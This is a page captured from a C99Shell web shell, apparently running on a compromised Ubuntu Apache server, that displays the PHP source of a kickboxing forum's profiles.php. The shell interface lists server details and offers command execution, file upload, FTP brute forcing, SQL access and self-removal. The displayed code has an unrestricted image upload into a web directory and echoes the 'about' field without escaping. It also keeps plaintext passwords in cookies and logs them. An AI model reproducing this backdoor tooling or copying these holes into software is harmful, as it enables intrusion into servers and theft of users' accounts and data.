!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g. PHP/5.2.4-2ubuntu5.12 

uname -a: Linux forum.circlefusion.com 2.6.24-19-server #1 SMP Wed Jun 18 15:18:00 UTC 2008 i686 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/home/doku/axrepos/ax/tests/boxing_forum/   drwxr-xr-x
Free 11.18 GB of 97.11 GB (11.51%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     profiles.php (11.9 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?

require('ax5.inc');

/*
    <font color="#feffd2">

        Table "profiles"
   Attribute   | Type | Modifier
---------------+------+----------
 name          | text | not null
 realname      | text |
 location      | text |
 compete_style | text |
 gym_attend    | text |
 height        | text |
 weight        | text |
 age           | text |
 gender        | text |
 about         | text |
 email         | text |
 url           | text |
Index: profiles_pkey

*/

function display_load_form($profile="")
?>
<form method="post">
    <table cellpadding="0" cellspacing="0">
        <tr>
            <td class="col1">Name:</td>
            <td class="col2">
                <input type="text" name="name" size="30" value="<? echo htmlspecialchars($profile[name]) ?>" /> 
                <input type="submit" name="action" value="Create/load profile" />
            </td>
        </tr>
    </table>
</form>
<? }

function 
textfield($label,$arrayname,$tag,$array) {
    return 
'<tr><td class="col1">'.$label.'</td><td class="col2"><input type="text" size="40" name="'.$arrayname.'['.$tag.']" size="40" value="'.htmlspecialchars($array[$tag]).'" /></td>';
}

function 
display_profile_form($profile)
?>
<form method="post" action="./profiles" enctype="multipart/form-data">
<table id="profileDisplay" cellpadding="0" cellspacing="0">
    <tr>
        <td class="col1">AX name:</td>
        <td class="col2">
            <input type="hidden" name="profile[name]" value="<? echo htmlspecialchars($profile[name]) ?>" />
            <span id="userName"><? echo htmlspecialchars($profile[name]) ?></span>
            &nbsp;[ <a href="./profiles?action=display&name=<? echo urlencode($profile[name]) ?>">View your profile</a> ] &nbsp;
            <input type="submit" name="action" value="Change user" />
            
<?php
    
echo textfield('Real name:','profile','realname',$profile);
    echo 
textfield('Email address:','profile','email',$profile);
    echo 
textfield('Webpage URL:','profile','url',$profile);
    echo 
textfield('Where do you live (include country please)?:','profile','location',$profile);
    echo 
textfield('What do you train/compete in?:','profile','compete_style',$profile);
    echo 
textfield('If you attend a gym, what gym do you attend?:','profile','gym_attend',$profile);
    echo 
textfield('Height:','profile','height',$profile);
    echo 
textfield('Weight:','profile','weight',$profile);
    echo 
textfield('Age:','profile','age',$profile);
    echo 
textfield('Gender:','profile','gender',$profile);
?>
    <tr>
        <td class="col1">
            Attach image:
        </td>
        <td class="col2">
            <input type="file" name="userfile" />
        </td>
    </tr>
    <tr>
        <td class="col1">
            Tell us about yourself:
        </td>
        <td class="col2">
            <textarea name="profile[about]"><? print $profile[about?></textarea>
        </td>
    <tr>
        <td class="col1">
            Password:
        </td>
        <td class="col2">
            <input type="password" name="profile[password]" size="10" value="<? echo htmlspecialchars($profile[password]) ?>" /> 
            <input type="submit" name="action" value="Save Profile" />
        </td>
    </tr>
</table>
</form>

<? }
/*
<!-- CSS Switcher -->
<table style="margin-left: 325px;">
<tr><td>
<br><br>
Select the Ax view style:
<form action="switcher.php" method="post">
<select name="set">
<option value="ax.css" selected>New Style</option>
<option value="ax_alt.css">Original</option>
</select>
<input type="submit" value="Change Style">
</form>
<!-- CSS Switcher -->
*/
function display_profile($profile)

global 
$HTTP_COOKIE_VARS;
?>


    
<table id="profileDisplay" cellpadding="0" cellspacing="0">
    <tr>
        <td class="col1">
            AX name:
        </td>
        <td  class="col2">
            <form method="post" action="./profiles">
            <span class="userName"><? echo htmlspecialchars($profile[name]) ?></span> &nbsp;
            <? 
                
if ($profile["name"]==$HTTP_COOKIE_VARS["name"]) {
                    echo 
" <input type=\"submit\" name=\"action\" value=\"Edit profile\" />";
                } 
            
?>
            </form>
        </td>
    </tr>
<? if ($profile['messages_posted']) { ?>
    <tr>
        <td class="col1">
            Number of posts:
        </td>
        <td class="col2">
            <? echo htmlspecialchars($profile[messages_posted]) ?>
        </td>
    </tr>
<? }; ?>
    <tr>
        <td class="col1">
            Real name:
        </td>
        <td class="col2">
            <? echo htmlspecialchars($profile[realname]) ?>
        </td>
    </tr>
    <tr>
        <td class="col1">
            Email address:
        </td>
        <td class="col2">
            <a href="mailto:<? echo htmlspecialchars($profile[email]) ?>"><? echo htmlspecialchars($profile[email]) ?></a>
        </td>
    </tr>
    <tr>
        <td class="col1">
            Webpage URL:
        </td>
        <td class="col2">
            <a href="<? echo htmlspecialchars(((strpos($profile['url'],'://')===FALSE)?'http://':'').trim($profile[url]))?>" rel="nofollw" target="_blank"><? echo htmlspecialchars($profile[url]) ?></a>
        </td>
    </tr>
    <tr>
        <td class="col1">
            Where do you live?:
        </td>
        <td class="col2">
            <? echo htmlspecialchars($profile[location]) ?>
        </td>
    </tr>
    <tr>
        <td class="col1">
            What do you train/compete in?:
        </td>
        <td class="col2">
            <? echo htmlspecialchars($profile[compete_style]) ?>
        </td>
    </tr>
    <tr>
        <td class="col1">
            If you attend a gym, what gym do you attend?:
        </td>
        <td class="col2">
            <? echo htmlspecialchars($profile[gym_attend]) ?>
        </td>
    </tr>
    <tr>
        <td class="col1">
            Height:
        </td>
        <td class="col2">
            <? echo htmlspecialchars($profile[height]) ?>
        </td>
    </tr>
    <tr>
        <td class="col1">
            Weight:
        </td>
        <td class="col2">
            <? echo htmlspecialchars($profile[weight]) ?>
        </td>
    </tr>
    <tr>
        <td class="col1">
            Age:
        </td>
        <td class="col2">
            <? echo htmlspecialchars($profile[age]) ?>
        </td>
    </tr>
    <tr>
        <td class="col1">
            Gender:
        </td>
        <td class="col2">
            <? echo htmlspecialchars($profile[gender]) ?>
        </td>
    </tr>
    <tr>
        <td class="col1">
            Tell us about yourself:
        </td>
        <td class="col2">
            <? print nl2br($profile[about]) ?>
        </td>
    </tr>
</table>

<? }

function 
retrieve_profile_data($name// try to retrieve profile data based on user name
{
    global 
$conn;

    
$result=pg_exec($conn,"select * from profiles where name='".addslashes($name)."';");
    if (
$result) {
        if (
pg_numrows($result)==0) {
            
$profile[name]=$name;
        } else {
            
$profile=pg_fetch_array($result,0);
            
$messages_result=pg_query($conn,"select messages_posted from users where name='".pg_escape_string($name)."';");
            
//echo pg_last_error();
            
if (pg_num_rows($messages_result)) {
                
$profile['messages_posted']=pg_result($messages_result,0,0);
            } else {
                
$profile['messages_posted']='';
            }
        }
        return 
$profile;
    }
    return 
false;
}

function 
update_profile_data($profile)
{
    global 
$conn;

    
$fields=array("name","realname","location","compete_style","gym_attend","height","weight","age","gender","about","email","url");
    
$names="(".implode(",",$fields).")";
    unset(
$value);
    while (list(
$key,$val) = each($fields)) {
        
$value[]=addslashes($profile[$val]);
    }
    
$values="('".implode("','",$value)."')";

    
pg_exec($conn,"begin;");
    
pg_exec($conn,"delete from profiles where name='".addslashes($profile[name])."';");
    
pg_exec($conn,"insert into profiles ".$names." values ".$values.";");
    
pg_exec($conn,"commit;");
    
pg_exec($conn,"end;");
}

// main

$conn=pg_connect("","","","","ax");

switch (
$action) {
    case 
"display":
        
$profile=retrieve_profile_data($HTTP_GET_VARS[name]);
        if (isset(
$profile[realname])) {
            
disp_preamble("Ax Profiles",$HTTP_GET_VARS[name]);
            
display_profile($profile);
        } else {
            
disp_preamble("Ax Profiles",$HTTP_GET_VARS[name]." - not found");
            if (
$HTTP_GET_VARS[name]==$HTTP_COOKIE_VARS[name]) {
                echo 
"<p align=center>You haven't created a profile yet.</p>";
            } else {
                echo 
"<p align=center>This user hasn't created a profile yet.</p>";
            }
        }
        
disp_tail();
        break;

    case 
"browse":
        
disp_preamble("Ax Profiles","Browsing Ax Profiles");
        
$result=pg_exec($conn,"select name, about from profiles order by lower(name);");
        
$rows=pg_numrows($result);
        echo 
"<div id=\"browseProfiles\">\n";
        echo 
"<h2>The following ".$rows." people have entered information about themselves:</h2>";
        echo 
"<ul>\n";
        for(
$row=0;$row<$rows;$row++) {
            
$obj=pg_fetch_array($result,$row);
            
// $about=$result[about];
            
$name=$obj[name];
            if (
substr_count(strtolower($obj[about]), "<img")>0)
            {            
                echo 
"<li><a href=\"profiles?action=display&name=".urlencode($name)."\">".$name."</a><font color=#99999> - With Photo</font>\n";
            }
            else
            {    
                echo 
"<li><a href=\"profiles?action=display&name=".urlencode($name)."\">".$name."</a>\n";
            }
        }
        echo 
"</ul>\n";
        echo 
"</div>\n";
        
disp_tail();
        break;

    case 
"Create/load profile":
        
disp_preamble("Ax Profiles",$HTTP_POST_VARS["name"]);
        
$profile=retrieve_profile_data($HTTP_POST_VARS[name]);
        if (
$HTTP_POST_VARS[name]==$HTTP_COOKIE_VARS[name])
            
$profile[password]=$HTTP_COOKIE_VARS[password];
        
display_profile_form($profile);
        
disp_tail();
        break;

    case 
"Save Profile":
        
$profile=$HTTP_POST_VARS["profile"];

        
$result=pg_query("select userid, name, password from users where name='".addslashes($profile[name])."' and password='".addslashes($profile[password])."';");
        if (
pg_numrows($result)==1) {
            
disp_preamble("Ax Profiles","Profile update successful");
            if (
$_FILES['userfile'] && $_FILES['userfile']['tmp_name']!="none" && $_FILES['userfile']['name']!="" )
            {
                
// posting image

                //$basedir="images/user_uploaded/";
                //$namepart=strtr($profile['name'],"/","-");
                
                
$row pg_fetch_row($result);
                
$user_id = (string) $row[0];
                
$full_base_path="/www/message.axkickboxing.com/public_html/";
                
$basedir="user_images/";
                
$mydir=$full_base_path.$basedir.$user_id;
                
                
$myumask=umask(2);
                @ 
mkdir($mydir,02775);
                @ 
chgrp($mydir,'www-data');

                
                
$filename $HTTP_POST_FILES['userfile']['name'];
                
$file_info pathinfo($filename);
                
$extension $file_info['extension'];
                
$file_basename basename($filename'.'.$extension);
                


                
$counter 0;    
                while (
file_exists($mydir."/".$filename)) {
                    
$counter++;
                    
$filename $file_basename."_".(string) $counter.".".$extension;
                    
                    
/*if ($counter == 10) {
                        echo "Filename:".$filename."\n";
                        echo "File upload failed. Quitting execution";
                        exit;
                    }*/
                
}
                
$full_file_path $mydir."/".$filename;
            
                if (
copy($HTTP_POST_FILES['userfile']['tmp_name'],$full_file_path)) {
                    @ 
chmod($full_file_path,0664);
                    @ 
chgrp($full_file_path,'ax');
                    
$link="http://message.axkickboxing.com/".$basedir.rawurlencode($user_id)."/".rawurlencode($filename);
                    
$profile['about'].="\n".'<br /><img src="'.$link.'" />'."\n";
                    
//$_POST['text']= $_POST['text']."\n<img src=\"".$link."\" /><br />";
                
};
                
umask($myumask);
            };
            
update_profile_data($profile);
            
pg_exec("insert into authattempt (name,password,result,date,ipaddr) values ('".addslashes($name)."','".addslashes($password)."','OK',now(),'".addslashes($REMOTE_ADDR)."');");
            echo 
"<p align=center>The information you entered is hopefully in the database now.</p>";
            
$profile=retrieve_profile_data($profile[name]);
            
$profile[password]=$HTTP_COOKIE_VARS[password];
            
display_profile_form($profile);
            
disp_tail();
        } else {
            
disp_preamble("Ax Profiles","Profile update failed");
            echo 
"<p align=center>We could not find your user account. Please check your name and password.</p>";
            
pg_exec("insert into authattempt (name,password,result,date,ipaddr) values ('".addslashes($name)."','".addslashes($password)."','failed',now(),'".addslashes($REMOTE_ADDR)."');");
            
display_profile_form($profile);
            
disp_tail();
        }
        break;

    case 
"Change user":
        
disp_preamble("Ax Profiles","");
        
display_load_form();
        
disp_tail();
        break;

    case 
"Edit Profile":

    default:
        if (isset(
$HTTP_COOKIE_VARS["name"])) {
            
disp_preamble("Ax Profiles",$HTTP_COOKIE_VARS["name"]);
            
$profile=retrieve_profile_data($HTTP_COOKIE_VARS["name"]);
            
//if (!isset($profile[realname])) $profile[realname]=$HTTP_COOKIE_VARS[name];
            
if ($profile[email]==""$profile[email]=$HTTP_COOKIE_VARS[email];
            if (
$profile[url]==""$profile[url]=$HTTP_COOKIE_VARS[url];
            
$profile[password]=$HTTP_COOKIE_VARS[password];
            
display_profile_form($profile);
            
disp_tail();
        } else {
            
disp_preamble("Ax Profiles","");
            
display_load_form();
            
disp_tail();
        }
}

?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0067 ]--